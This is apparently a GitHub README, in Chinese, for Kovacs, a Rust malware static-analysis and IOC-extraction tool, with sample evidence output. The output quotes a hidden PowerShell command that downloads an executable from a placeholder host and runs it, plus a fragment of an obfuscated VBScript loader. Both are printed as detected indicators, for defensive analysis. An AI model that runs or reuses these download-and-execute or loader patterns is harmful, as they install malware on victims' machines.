omifares/kovacs

# Kovacs **Kovacs** 是一款使用 Rust 开发的静态分析和恶意软件快速分类工具。专为提取 IOC 而设计。 ## 功能 * **证据生成：** 自动创建一个 `$HOME/.local/share/kovacs/evidences/HASH.evidence(.json .md)` 报告，其中包含监管链（SHA256 哈希）和发现的 IOC。 * **网络提取：** 识别并提取 IP 和 URL。 * **多层去混淆：** * **Base64 解码器：** 查找并解码 base64 字符串。 * **字符串操作：** 检测并还原原生技术，如 `StrReverse`。 * **状态跟踪：** 在分析时跟踪内存中的变量，并解析恶意的拼接（例如：`A = "cmd" & ".exe"`）。 * **数组数学解码器：** 破解隐藏在十六进制数组和 `Chr()` 函数中的 payload。 ## 重要提示！ 本项目是**严格作为个人学习目的**而开发的，用于恶意软件分析和逆向工程领域。 请注意： * **免责声明：** 我不对因使用该工具的输出而造成的任何损害、感染、数据丢失或事件响应决策负责。**使用风险由您自己承担**。 * **非企业级工具：** Kovacs 不能替代 Antivírus 引擎、EDR 或由分析师进行的深入分析。 * **误报和漏报：** 正则表达式和分析方法可能会失败，产生错误警报或无法检测到更高级的混淆。 * **安全：** 切勿在受控和隔离的环境之外处理恶意工件。 ## 安装 ``` git clone https://github.com/Vinicin1101/kovacs cd kovacs cargo build --release ``` ## 如何使用 ``` ./target/release/kovacs ``` ## 结果 #### `evidence.json` ``` { "urls": [ "https://url.example.net/" ], "ips": [], "base64_strings": [], "reversed_strings": [], "script_obfuscation": [], "stateful_obfuscation": [], "shifted_array_strings": [], "plaintext_iocs": [ "start /min cmd.exe /c powershell -WindowStyle Hidden -Command \"& { iwr -Uri '(https://url.example.net/Stb/Retev.php?kaDhs7ys.txt' -OutFile $env:TEMP\\BK473087.exe; Start-Process -FilePath $env:TEMP\\BK473087.exe -WindowStyle Hidden }\"" ] } ``` #### `evidence.ms` ``` # --- [ KOVACS EVIDENCES ] --- ## [ URL IOC ] URL: hTtPS://url.example.net ## [ 检测到混淆 (Array Math) ] Array Shift Decoded: "script:hTtPS://url.example.net/?1/" ## [ 明文威胁扫描 ] Plaintext IOC Detected: Dim lI, UOFY, QbJ2K, i : lI = Array(&H70 , &H61 , &H72 , &H6C , &H6D , &H72 , &H3D , &H69 , &H52 , &H77 , &H52 , &H53 , &H3C , &H30 , &H30 , &H69 , &H69 ...) : UOFY = Array(3 , 2 , 0 , -3 , 3 , 2 , -3 , -1 , 2 , -3 , -2 , 0 , -2 , -1 , -1 ....) : QbJ2K = "" : For i = 0 To UBound(lI) : QbJ2K = QbJ2K & Chr(lI(i) + UOFY(i)) : Next : s = "Ge" & "tObj" & "ect" : Execute s & "(QbJ2K)" ```

标签：DAST, DNS 反向解析, IOC提取, IP 地址批量处理, Rust, 云安全监控, 云资产清单, 可视化界面, 恶意软件分析, 网络流量审计, 逆向工程, 通知系统, 静态分析